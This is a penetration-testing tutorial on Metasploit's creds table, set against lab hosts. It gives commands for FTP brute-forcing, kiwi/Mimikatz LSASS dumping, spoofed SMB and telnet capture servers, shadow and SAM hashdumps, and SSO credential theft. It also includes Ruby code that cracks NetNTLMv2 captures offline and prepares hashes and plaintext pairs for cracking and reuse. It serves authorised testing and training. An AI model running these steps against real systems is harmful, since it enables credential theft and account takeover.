Metasploit for Pentester: Creds

This article continues the Metasploit for Pentester series. In the previous article, Metasploit for Pentester: Database & Workspace, we covered Workspaces and the Metasploit database service. Here we look at another table inside a Workspace that Penetration Testers can make use of: creds.

Table of Content

  • Recap and DB Initialization
  • Introduction
  • Extracting Creds
    • From Bruteforce
    • From Mimikatz
    • From Telnet
    • From SMB
    • From Hashdump
    • From SSO
  • Search Filter
    • By Username
    • By Type
    • By Port
    • By Host
    • By Service
  • Adding Credentials
  • Exporting Credentials
  • Conclusion

Recap and DB Initialization

As a short recap of the Workspace article: Metasploit has a PostgreSQL database at its disposal, inside which Penetration Testers can create Workspaces for their engagements. A Workspace holds several tables, such as hosts and vulns, which store the hosts and findings enumerated with db_nmap and the Metasploit auxiliary modules. Alongside those there is another table called creds. Before going into its functionality, initialise the database with the following command. Everything described below depends on msfconsole actually being connected to the database, so check with db_status first if entries do not appear.

msfdb init

Introduction

After initialising, running the creds command on its own prints the table that will hold the credentials we collect (empty at this point). Its columns are: host, the IP address of the host the credential belongs to; origin, where we obtained the credential (a session, a service, a manual entry or an import); service, the port, protocol and service name through which the credential was obtained or validated; public, which in most cases is the username; and private, the secret itself, which may be a password, a hash or a key. There are further columns (realm and private_type) that we will come back to later. One more column, JtR Format, names the John the Ripper format that can be used to crack a stored hash.

creds

Extracting Creds: Bruteforce

As mentioned in the Introduction, the creds table is populated with the valid credentials we find using Metasploit modules. To demonstrate collection from a brute-force attack, we target the FTP service on a server with the auxiliary/scanner/ftp/ftp_login scanner module. We set the target host, a user file of candidate usernames and a pass file of candidate passwords; stop_on_success makes the module stop at the first valid pair. After working through the lists, the module found the valid credentials privs/123. Running creds afterwards shows the table's very first entry, as in the image below.

use auxiliary/scanner/ftp/ftp_login
set rhosts 192.168.1.40
set user_file /root/users.txt
set pass_file /root/pass.txt
set verbose false
set stop_on_success true
exploit
creds

Extracting Creds: Mimikatz

We will not run Mimikatz directly on the target; instead we use the Meterpreter extension kiwi, which embeds it. We first compromise a Windows machine and obtain a meterpreter session on it, then load the kiwi extension and run creds_all to pull every credential it can reach: NTLM hashes and, where LSASS still caches them, clear-text passwords. Reading LSASS requires SYSTEM privileges (or at least SeDebugPrivilege), so if creds_all returns nothing, elevate the session first.

load kiwi
creds_all

Let's run the creds command again to confirm that the newly enumerated credentials were written to the table. We can see the clear-text password and the NTLM hashes added, with the host column showing that the NTLM hashes came from the Windows machine at 192.168.1.21 while the FTP credentials came from 192.168.1.40.

Extracting Creds: Telnet

Moving on from FTP and NTLM hashes, we capture telnet credentials with a different kind of module: auxiliary/server/capture/telnet. Rather than scanning a target, it starts a fake telnet server on our own machine (SRVHOST, here 192.168.1.9) and records whatever username and password a connecting client types. In the demonstration a client at 192.168.1.3 connected to it and logged in as ignited/123. As always, running creds confirms that the table has been populated with the telnet credentials.

use auxiliary/server/capture/telnet
set srvhost 192.168.1.9
exploit
creds

Extracting Creds: SMB

Next we target a Windows machine with the SMB capture server and provoke it into authenticating to us so that we can capture its NTLM challenge-response. We use auxiliary/server/capture/smb together with auxiliary/spoof/nbns/nbns_response. For the capture server we set the host to serve on and JOHNPWFILE, a filename prefix under which the captured hashes are written in John the Ripper format. For the spoofer we set SPOOFIP (our capture host) and the interface; it answers the victim's NetBIOS name lookups with our address, so the victim connects to our SMB server and authenticates. The captured hashes are shown in the image below. Note what is captured here: a NetNTLMv1/v2 challenge-response, not the account's NT hash. It can be cracked offline with John (format netntlmv2) or relayed while the connection is live, but it cannot be used for pass-the-hash.

use auxiliary/server/capture/smb
set srvhost 192.168.1.9
set johnpwfile /root/Desktop
exploit
use auxiliary/spoof/nbns/nbns_response
set spoofip 192.168.1.9
set interface eth0
exploit

Since the capture was successful, these hashes are automatically written to the creds table, where they are stored as non-replayable hashes with their JtR format. We can check the entries by running the creds command as shown in the image below.
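As an added example (not code from the original article or from Metasploit), the following Ruby script shows what the capture above actually contains and why the JOHNPWFILE matters: it derives a NetNTLMv2 response from a known password, writes it in the user::domain:challenge:ntproofstr:blob layout that John's netntlmv2 format reads, and then recovers the password from that line by an offline dictionary attack. The user, domain, server challenge, blob and wordlist are constructed sample values; MD4 is implemented in Ruby because OpenSSL 3 only ships it in the legacy provider.

```ruby
# Added example (not from the original article): what auxiliary/server/capture/smb
# records is a NetNTLMv2 challenge/response, not the account's NT hash.
# Build one capture line from a known password, then crack it offline.
# User, domain, challenge, blob and wordlist are all constructed sample values.
require 'openssl'

MASK32 = 0xffffffff

# Pure-Ruby MD4 (RFC 1320). OpenSSL 3 only provides MD4 in its legacy
# provider, so OpenSSL::Digest::MD4 is not reliably available.
def md4(msg)
  rotl = ->(x, s) { ((x << s) | (x >> (32 - s))) & MASK32 }
  f = ->(x, y, z) { (x & y) | ((x ^ MASK32) & z) }
  g = ->(x, y, z) { (x & y) | (x & z) | (y & z) }
  h = ->(x, y, z) { x ^ y ^ z }

  bit_len = msg.bytesize * 8
  data = msg.b + "\x80".b
  data << "\x00".b while data.bytesize % 64 != 56
  data << [bit_len & MASK32, (bit_len >> 32) & MASK32].pack('V2')

  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  data.bytes.each_slice(64) do |block|
    x = block.pack('C*').unpack('V16')
    aa, bb, cc, dd = a, b, c, d
    16.times do |i| # round 1
      t = rotl.call((a + f.call(b, c, d) + x[i]) & MASK32, [3, 7, 11, 19][i % 4])
      a, b, c, d = d, t, b, c
    end
    [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15].each_with_index do |k, i| # round 2
      t = rotl.call((a + g.call(b, c, d) + x[k] + 0x5a827999) & MASK32, [3, 5, 9, 13][i % 4])
      a, b, c, d = d, t, b, c
    end
    [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].each_with_index do |k, i| # round 3
      t = rotl.call((a + h.call(b, c, d) + x[k] + 0x6ed9eba1) & MASK32, [3, 9, 11, 15][i % 4])
      a, b, c, d = d, t, b, c
    end
    a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4')
end

# NT hash = MD4 of the UTF-16LE password. This is what hashdump/kiwi return
# and what pass-the-hash needs; the capture server never sees it.
def nt_hash(password)
  md4(password.encode('UTF-16LE'))
end

# NTLMv2 response key: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain.
def ntlmv2_key(user, domain, password)
  OpenSSL::HMAC.digest('MD5', nt_hash(password), (user.upcase + domain).encode('UTF-16LE'))
end

# NTProofStr: HMAC-MD5 keyed with the NTLMv2 key over server challenge || blob.
# The challenge is fresh per connection, so the capture can only be cracked
# offline (or relayed while the connection is live), never replayed.
def nt_proof_str(user, domain, password, server_challenge, blob)
  OpenSSL::HMAC.digest('MD5', ntlmv2_key(user, domain, password), server_challenge + blob)
end

# The line layout john --format=netntlmv2 reads: user::domain:challenge:ntproofstr:blob
def capture_line(user, domain, password, server_challenge, blob)
  proof = nt_proof_str(user, domain, password, server_challenge, blob)
  [user, '', domain, server_challenge.unpack1('H*'), proof.unpack1('H*'), blob.unpack1('H*')].join(':')
end

# Offline dictionary attack against one capture line; returns the password or nil
def crack_netntlmv2(line, wordlist)
  user, _, domain, chal_hex, proof_hex, blob_hex = line.split(':', 6)
  challenge = [chal_hex].pack('H*')
  blob = [blob_hex].pack('H*')
  wordlist.find { |w| nt_proof_str(user, domain, w, challenge, blob).unpack1('H*') == proof_hex }
end

# Constructed sample: 8-byte server challenge and a minimal NTLMv2 blob
# (0x0101 header, reserved, timestamp, client nonce, reserved, empty AV_PAIR list)
SAMPLE_CHALLENGE = ['1122334455667788'].pack('H*')
SAMPLE_BLOB = [%w[0101000000000000 0080e2d2b1c8d801 a1b2c3d4e5f60718 00000000 00000000 00000000].join].pack('H*')

if __FILE__ == $PROGRAM_NAME
  line = capture_line('raj', 'IGNITE', 'password', SAMPLE_CHALLENGE, SAMPLE_BLOB)
  puts line
  puts "cracked: #{crack_netntlmv2(line, %w[123456 letmein password]).inspect}"
end
```

The dictionary loop is exactly what john does with the file written under JOHNPWFILE, just without the optimisations; the point to take away is that every candidate has to be run through HMAC-MD5 twice against the captured challenge, which is why the result lands in creds as a hash to be cracked rather than as a reusable secret.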

Extracting Creds: Hashdump

Moving on from NTLM hashes on Windows to password hashes on Linux. To collect them we use the hashdump post-exploitation module, which reads /etc/passwd and /etc/shadow on a compromised Linux machine and records every user's hash. Because /etc/shadow is readable only by root, the session given to the module has to be a root session. The image below shows the extracted hashes added to the creds table.

use post/linux/gather/hashdump
set session 3
exploit

It is not always necessary to run a post-exploitation module. Meterpreter has a built-in hashdump command that can be run directly from the meterpreter prompt; on Windows it dumps the local SAM and therefore needs SYSTEM privileges (run getsystem first if the session does not have them). It lists the extracted hashes as shown in the image.

hashdump

Going back to the creds table, it now holds the hashes recovered both by the hashdump post-exploitation module and by the hashdump meterpreter command we just ran.

Extracting Creds: SSO

Next we target a domain-joined Windows system and collect the Single Sign-On credentials cached on it with the post-exploitation module windows/gather/credentials/sso. The module uses the Mimikatz (kiwi) extension to read plaintext logon credentials from the Local Security Authority, so, like kiwi itself, it needs a privileged session. The image below shows the SSO password for the user Nisha being extracted.

use post/windows/gather/credentials/sso
set session 1
exploit

Let's check whether the SSO credentials for the user Nisha made their way into the creds table. Running the creds command shows that they did.

Search Filter: Username

When working with many targets across a large network, it becomes hard to find a particular set of credentials in a long table. The creds command offers filters to narrow the listing. The most basic one is the username filter: the -u option lists the entries whose username matches the given text, which is treated as a regular expression, so a partial name matches as well. In the demonstration below we search for credentials with the username raj.

creds -u raj

Search Filter: Type

The next filter selects by credential type. To use it we need to know how creds classifies the private values it stores: clear-text passwords are of type password, NTLM hashes are of type ntlm, other non-replayable hashes (such as the captured challenge-responses and the Linux shadow hashes) are of type hash, and SSH private keys are of type ssh_key. Hence, when we use the -t option with ntlm we get all the captured NTLM hashes, as shown in the image below.

creds -t ntlm

Search Filter: Port

From the credential type we move to the port the credential was extracted from. Credentials come from a particular service, and that service listens on a specific port; the -p option followed by a port number restricts the listing to credentials tied to a login on that port. In the demonstration below we search for credentials extracted from port 23.

creds -p 23

Search Filter: Host

The next filter selects by host, meaning the origin of the credential: the host it was extracted or captured from. The -O option followed by an IP address lists every credential that originated from that host, as shown in the image below.

creds -O 192.168.1.136

Search Filter: Service

Having filtered by host, port, type and username, we come to the last filter, which selects by the service the credentials were extracted from. This is similar to the port filter, but services do not always run on their default ports, so filtering by service name with -s (which also accepts a comma-separated list of names) is the more reliable choice.

creds -s ftp

Adding Credentials

We have shown several ways of getting credentials into the creds table. If those are not enough and you want a particular credential in your database, for example one obtained outside Metasploit, you can add it manually with creds add. The credential is given as tagged fields, at minimum user:<username> and password:<password>; hashes and keys are added with the ntlm:, hash: and ssh-key: tags instead of password:. In the demonstration below we add credentials for the user Pavan.

Exporting Credentials

As discussed in the previous article on hosts and workspaces, their contents can be exported to a CSV file for reporting and other purposes. The creds command is no exception: to export the creds table to a file, use the -o option followed by the file name, as shown below. The same option can write the stored hashes in John the Ripper format instead of CSV (see creds -h), which is the quickest way to hand everything collected so far to john.

creds -o raj.csv
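As an added example (not code from the original article or from Metasploit), the following Ruby script works on such a CSV export offline. It parses the rows, reproduces the -u, -t, -p, -s and -O filters from the search section over them, and turns the stored hashes into per-format input files for John the Ripper. The column layout is assumed to match the creds table (host, origin, service, public, private, realm, private_type, JtR Format), and the rows in SAMPLE_EXPORT are constructed sample data using the addresses from this article.

```ruby
# Added example (not from the original article): offline processing of a
# "creds -o export.csv" file. Column layout assumed to match the creds table;
# the sample rows are constructed, not a real export.
require 'csv'

Cred = Struct.new(:host, :origin, :service, :public, :private, :realm, :private_type, :jtr) do
  # service looks like "21/tcp (ftp)"; split it into its port and name
  def port
    service.to_s[%r{\A(\d+)/}, 1]&.to_i
  end

  def service_name
    service.to_s[/\((\w+)\)/, 1]
  end
end

SAMPLE_EXPORT = <<~EXPORT
  host,origin,service,public,private,realm,private_type,JtR Format
  192.168.1.40,192.168.1.40,21/tcp (ftp),privs,123,,Password,
  192.168.1.3,192.168.1.9,23/tcp (telnet),ignited,123,,Password,
  192.168.1.21,192.168.1.21,,raj,aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c,,NTLM hash,nt
  192.168.1.21,192.168.1.9,445/tcp (smb),raj,raj::IGNITE:1122334455667788:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000,IGNITE,Nonreplayable hash,netntlmv2
  192.168.1.136,192.168.1.136,,nisha,Password@1,IGNITE,Password,
EXPORT

def parse_creds_csv(text)
  CSV.parse(text, headers: true).map { |row| Cred.new(*row.fields) }
end

# How the -t values map onto the private_type column
TYPE_NAMES = {
  'password' => 'Password',
  'ntlm'     => 'NTLM hash',
  'hash'     => 'Nonreplayable hash',
  'ssh_key'  => 'SSH key'
}.freeze

# Mirrors creds -u/-t/-p/-s/-O: filters are ANDed, nil means "not given"
def filter_creds(creds, user: nil, type: nil, port: nil, service: nil, origin: nil)
  creds.select do |c|
    (user.nil?    || c.public.to_s.match?(Regexp.new(user))) &&
      (type.nil?    || c.private_type == TYPE_NAMES.fetch(type)) &&
      (port.nil?    || c.port == port) &&
      (service.nil? || service.split(',').include?(c.service_name)) &&
      (origin.nil?  || c.origin == origin)
  end
end

# Group crackable hashes by JtR format, one line per hash in a layout john
# reads: pwdump-style "user:uid:LM:NT:::" for nt, the capture line as-is for
# netntlmv2, and "user:hash" for anything else (e.g. shadow hashes).
def john_inputs(creds)
  creds.reject { |c| c.private_type == 'Password' || c.jtr.to_s.empty? }
       .group_by(&:jtr)
       .transform_values do |list|
         list.map do |c|
           case c.jtr
           when 'nt'        then "#{c.public}:1000:#{c.private}:::"
           when 'netntlmv2' then c.private
           else                  "#{c.public}:#{c.private}"
           end
         end
       end
end

# Clear-text pairs, ready to be re-tried against other hosts in the estate
def plaintext_pairs(creds)
  creds.select { |c| c.private_type == 'Password' }.map { |c| "#{c.public}:#{c.private}" }.uniq
end

if __FILE__ == $PROGRAM_NAME
  creds = parse_creds_csv(SAMPLE_EXPORT)
  puts filter_creds(creds, user: 'raj').map(&:to_a).inspect
  john_inputs(creds).each { |fmt, lines| puts "# john --format=#{fmt}"; puts lines }
  puts plaintext_pairs(creds)
end
```

Point the parser at a real export by replacing SAMPLE_EXPORT with File.read of the file written by creds -o; the private_type and JtR Format columns are what make the split between "spray these" and "crack these" mechanical.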

Conclusion

This was a learning experience: when we begin with penetration testing, we tend not to focus on documenting the work or giving it a proper structure and backup, and it takes a few incidents where those were missing to show how valuable they are. The creds table in Metasploit is not a new feature; it has been there for years, yet it seems to see very little use in real engagements. That is what prompted this guide, so that more Penetration Testers can use it and benefit from it.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. He can be contacted on Twitter and LinkedIn.